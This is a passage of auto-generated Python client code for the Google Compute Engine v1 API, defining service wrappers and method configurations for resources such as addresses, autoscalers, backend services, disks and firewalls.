ordered_params=[u'project', u'zone', u'acceleratorType'],
path_params=[u'acceleratorType', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/acceleratorTypes/{acceleratorType}',
request_field='',
request_type_name=u'ComputeAcceleratorTypesGetRequest',
response_type_name=u'AcceleratorType',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of accelerator types available to the specified project.
Args:
request: (ComputeAcceleratorTypesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AcceleratorTypeList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.acceleratorTypes.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/acceleratorTypes',
request_field='',
request_type_name=u'ComputeAcceleratorTypesListRequest',
response_type_name=u'AcceleratorTypeList',
supports_download=False,
)
class AddressesService(base_api.BaseApiService):
"""Service class for the addresses resource."""
_NAME = u'addresses'
def __init__(self, client):
super(ComputeV1.AddressesService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of addresses.
Args:
request: (ComputeAddressesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AddressAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.addresses.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/addresses',
request_field='',
request_type_name=u'ComputeAddressesAggregatedListRequest',
response_type_name=u'AddressAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified address resource.
Args:
request: (ComputeAddressesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.addresses.delete',
ordered_params=[u'project', u'region', u'address'],
path_params=[u'address', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/addresses/{address}',
request_field='',
request_type_name=u'ComputeAddressesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified address resource.
Args:
request: (ComputeAddressesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Address) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.addresses.get',
ordered_params=[u'project', u'region', u'address'],
path_params=[u'address', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/addresses/{address}',
request_field='',
request_type_name=u'ComputeAddressesGetRequest',
response_type_name=u'Address',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an address resource in the specified project using the data included in the request.
Args:
request: (ComputeAddressesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.addresses.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/addresses',
request_field=u'address',
request_type_name=u'ComputeAddressesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of addresses contained within the specified region.
Args:
request: (ComputeAddressesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AddressList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.addresses.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/addresses',
request_field='',
request_type_name=u'ComputeAddressesListRequest',
response_type_name=u'AddressList',
supports_download=False,
)
class AutoscalersService(base_api.BaseApiService):
"""Service class for the autoscalers resource."""
_NAME = u'autoscalers'
def __init__(self, client):
super(ComputeV1.AutoscalersService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of autoscalers.
Args:
request: (ComputeAutoscalersAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AutoscalerAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.autoscalers.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/autoscalers',
request_field='',
request_type_name=u'ComputeAutoscalersAggregatedListRequest',
response_type_name=u'AutoscalerAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified autoscaler.
Args:
request: (ComputeAutoscalersDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.autoscalers.delete',
ordered_params=[u'project', u'zone', u'autoscaler'],
path_params=[u'autoscaler', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/autoscalers/{autoscaler}',
request_field='',
request_type_name=u'ComputeAutoscalersDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified autoscaler resource. Get a list of available autoscalers by making a list() request.
Args:
request: (ComputeAutoscalersGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Autoscaler) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.autoscalers.get',
ordered_params=[u'project', u'zone', u'autoscaler'],
path_params=[u'autoscaler', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/autoscalers/{autoscaler}',
request_field='',
request_type_name=u'ComputeAutoscalersGetRequest',
response_type_name=u'Autoscaler',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an autoscaler in the specified project using the data included in the request.
Args:
request: (ComputeAutoscalersInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.autoscalers.insert',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/autoscalers',
request_field=u'autoscaler',
request_type_name=u'ComputeAutoscalersInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of autoscalers contained within the specified zone.
Args:
request: (ComputeAutoscalersListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AutoscalerList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.autoscalers.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/autoscalers',
request_field='',
request_type_name=u'ComputeAutoscalersListRequest',
response_type_name=u'AutoscalerList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates an autoscaler in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeAutoscalersPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.autoscalers.patch',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'autoscaler'],
relative_path=u'projects/{project}/zones/{zone}/autoscalers',
request_field=u'autoscalerResource',
request_type_name=u'ComputeAutoscalersPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates an autoscaler in the specified project using the data included in the request.
Args:
request: (ComputeAutoscalersUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.autoscalers.update',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'autoscaler'],
relative_path=u'projects/{project}/zones/{zone}/autoscalers',
request_field=u'autoscalerResource',
request_type_name=u'ComputeAutoscalersUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class BackendBucketsService(base_api.BaseApiService):
"""Service class for the backendBuckets resource."""
_NAME = u'backendBuckets'
def __init__(self, client):
super(ComputeV1.BackendBucketsService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified BackendBucket resource.
Args:
request: (ComputeBackendBucketsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.backendBuckets.delete',
ordered_params=[u'project', u'backendBucket'],
path_params=[u'backendBucket', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
request_field='',
request_type_name=u'ComputeBackendBucketsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified BackendBucket resource. Get a list of available backend buckets by making a list() request.
Args:
request: (ComputeBackendBucketsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendBucket) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.backendBuckets.get',
ordered_params=[u'project', u'backendBucket'],
path_params=[u'backendBucket', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
request_field='',
request_type_name=u'ComputeBackendBucketsGetRequest',
response_type_name=u'BackendBucket',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a BackendBucket resource in the specified project using the data included in the request.
Args:
request: (ComputeBackendBucketsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendBuckets.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendBuckets',
request_field=u'backendBucket',
request_type_name=u'ComputeBackendBucketsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of BackendBucket resources available to the specified project.
Args:
request: (ComputeBackendBucketsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendBucketList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.backendBuckets.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/backendBuckets',
request_field='',
request_type_name=u'ComputeBackendBucketsListRequest',
response_type_name=u'BackendBucketList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates the specified BackendBucket resource with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeBackendBucketsPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.backendBuckets.patch',
ordered_params=[u'project', u'backendBucket'],
path_params=[u'backendBucket', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
request_field=u'backendBucketResource',
request_type_name=u'ComputeBackendBucketsPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates the specified BackendBucket resource with the data included in the request.
Args:
request: (ComputeBackendBucketsUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.backendBuckets.update',
ordered_params=[u'project', u'backendBucket'],
path_params=[u'backendBucket', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
request_field=u'backendBucketResource',
request_type_name=u'ComputeBackendBucketsUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class BackendServicesService(base_api.BaseApiService):
"""Service class for the backendServices resource."""
_NAME = u'backendServices'
def __init__(self, client):
super(ComputeV1.BackendServicesService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves the list of all BackendService resources, regional and global, available to the specified project.
Args:
request: (ComputeBackendServicesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendServiceAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.backendServices.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/backendServices',
request_field='',
request_type_name=u'ComputeBackendServicesAggregatedListRequest',
response_type_name=u'BackendServiceAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified BackendService resource.
Args:
request: (ComputeBackendServicesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.backendServices.delete',
ordered_params=[u'project', u'backendService'],
path_params=[u'backendService', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendServices/{backendService}',
request_field='',
request_type_name=u'ComputeBackendServicesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified BackendService resource. Get a list of available backend services by making a list() request.
Args:
request: (ComputeBackendServicesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendService) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.backendServices.get',
ordered_params=[u'project', u'backendService'],
path_params=[u'backendService', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendServices/{backendService}',
request_field='',
request_type_name=u'ComputeBackendServicesGetRequest',
response_type_name=u'BackendService',
supports_download=False,
)
def GetHealth(self, request, global_params=None):
"""Gets the most recent health check results for this BackendService.
Args:
request: (ComputeBackendServicesGetHealthRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendServiceGroupHealth) The response message.
"""
config = self.GetMethodConfig('GetHealth')
return self._RunMethod(
config, request, global_params=global_params)
GetHealth.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendServices.getHealth',
ordered_params=[u'project', u'backendService'],
path_params=[u'backendService', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendServices/{backendService}/getHealth',
request_field=u'resourceGroupReference',
request_type_name=u'ComputeBackendServicesGetHealthRequest',
response_type_name=u'BackendServiceGroupHealth',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a BackendService resource in the specified project using the data included in the request. There are several restrictions and guidelines to keep in mind when creating a backend service. Read Restrictions and Guidelines for more information.
Args:
request: (ComputeBackendServicesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendServices.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendServices',
request_field=u'backendService',
request_type_name=u'ComputeBackendServicesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of BackendService resources available to the specified project.
Args:
request: (ComputeBackendServicesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendServiceList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.backendServices.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/backendServices',
request_field='',
request_type_name=u'ComputeBackendServicesListRequest',
response_type_name=u'BackendServiceList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Patches the specified BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeBackendServicesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.backendServices.patch',
ordered_params=[u'project', u'backendService'],
path_params=[u'backendService', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendServices/{backendService}',
request_field=u'backendServiceResource',
request_type_name=u'ComputeBackendServicesPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates the specified BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information.
Args:
request: (ComputeBackendServicesUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.backendServices.update',
ordered_params=[u'project', u'backendService'],
path_params=[u'backendService', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendServices/{backendService}',
request_field=u'backendServiceResource',
request_type_name=u'ComputeBackendServicesUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class DiskTypesService(base_api.BaseApiService):
"""Service class for the diskTypes resource."""
_NAME = u'diskTypes'
def __init__(self, client):
super(ComputeV1.DiskTypesService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of disk types.
Args:
request: (ComputeDiskTypesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DiskTypeAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.diskTypes.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/diskTypes',
request_field='',
request_type_name=u'ComputeDiskTypesAggregatedListRequest',
response_type_name=u'DiskTypeAggregatedList',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified disk type. Get a list of available disk types by making a list() request.
Args:
request: (ComputeDiskTypesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DiskType) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.diskTypes.get',
ordered_params=[u'project', u'zone', u'diskType'],
path_params=[u'diskType', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/diskTypes/{diskType}',
request_field='',
request_type_name=u'ComputeDiskTypesGetRequest',
response_type_name=u'DiskType',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of disk types available to the specified project.
Args:
request: (ComputeDiskTypesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DiskTypeList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.diskTypes.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/diskTypes',
request_field='',
request_type_name=u'ComputeDiskTypesListRequest',
response_type_name=u'DiskTypeList',
supports_download=False,
)
class DisksService(base_api.BaseApiService):
"""Service class for the disks resource."""
_NAME = u'disks'
def __init__(self, client):
super(ComputeV1.DisksService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of persistent disks.
Args:
request: (ComputeDisksAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DiskAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.disks.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/disks',
request_field='',
request_type_name=u'ComputeDisksAggregatedListRequest',
response_type_name=u'DiskAggregatedList',
supports_download=False,
)
def CreateSnapshot(self, request, global_params=None):
"""Creates a snapshot of a specified persistent disk.
Args:
request: (ComputeDisksCreateSnapshotRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('CreateSnapshot')
return self._RunMethod(
config, request, global_params=global_params)
CreateSnapshot.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.disks.createSnapshot',
ordered_params=[u'project', u'zone', u'disk'],
path_params=[u'disk', u'project', u'zone'],
query_params=[u'guestFlush'],
relative_path=u'projects/{project}/zones/{zone}/disks/{disk}/createSnapshot',
request_field=u'snapshot',
request_type_name=u'ComputeDisksCreateSnapshotRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified persistent disk. Deleting a disk removes its data permanently and is irreversible. However, deleting a disk does not delete any snapshots previously made from the disk. You must separately delete snapshots.
Args:
request: (ComputeDisksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.disks.delete',
ordered_params=[u'project', u'zone', u'disk'],
path_params=[u'disk', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/disks/{disk}',
request_field='',
request_type_name=u'ComputeDisksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns a specified persistent disk. Get a list of available persistent disks by making a list() request.
Args:
request: (ComputeDisksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Disk) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.disks.get',
ordered_params=[u'project', u'zone', u'disk'],
path_params=[u'disk', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/disks/{disk}',
request_field='',
request_type_name=u'ComputeDisksGetRequest',
response_type_name=u'Disk',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a persistent disk in the specified project using the data in the request. You can create a disk with a sourceImage, a sourceSnapshot, or create an empty 500 GB data disk by omitting all properties. You can also create a disk that is larger than the default size by specifying the sizeGb property.
Args:
request: (ComputeDisksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.disks.insert',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'sourceImage'],
relative_path=u'projects/{project}/zones/{zone}/disks',
request_field=u'disk',
request_type_name=u'ComputeDisksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of persistent disks contained within the specified zone.
Args:
request: (ComputeDisksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DiskList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.disks.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/disks',
request_field='',
request_type_name=u'ComputeDisksListRequest',
response_type_name=u'DiskList',
supports_download=False,
)
def Resize(self, request, global_params=None):
"""Resizes the specified persistent disk.
Args:
request: (ComputeDisksResizeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Resize')
return self._RunMethod(
config, request, global_params=global_params)
Resize.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.disks.resize',
ordered_params=[u'project', u'zone', u'disk'],
path_params=[u'disk', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/disks/{disk}/resize',
request_field=u'disksResizeRequest',
request_type_name=u'ComputeDisksResizeRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on a disk. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeDisksSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.disks.setLabels',
ordered_params=[u'project', u'zone', u'resource'],
path_params=[u'project', u'resource', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/disks/{resource}/setLabels',
request_field=u'zoneSetLabelsRequest',
request_type_name=u'ComputeDisksSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
class FirewallsService(base_api.BaseApiService):
"""Service class for the firewalls resource."""
_NAME = u'firewalls'
def __init__(self, client):
super(ComputeV1.FirewallsService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified firewall.
Args:
request: (ComputeFirewallsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.firewalls.delete',
ordered_params=[u'project', u'firewall'],
path_params=[u'firewall', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/firewalls/{firewall}',
request_field='',
request_type_name=u'ComputeFirewallsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified firewall.
Args:
request: (ComputeFirewallsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Firewall) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.firewalls.get',
ordered_params=[u'project', u'firewall'],
path_params=[u'firewall', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/firewalls/{firewall}',
request_field='',
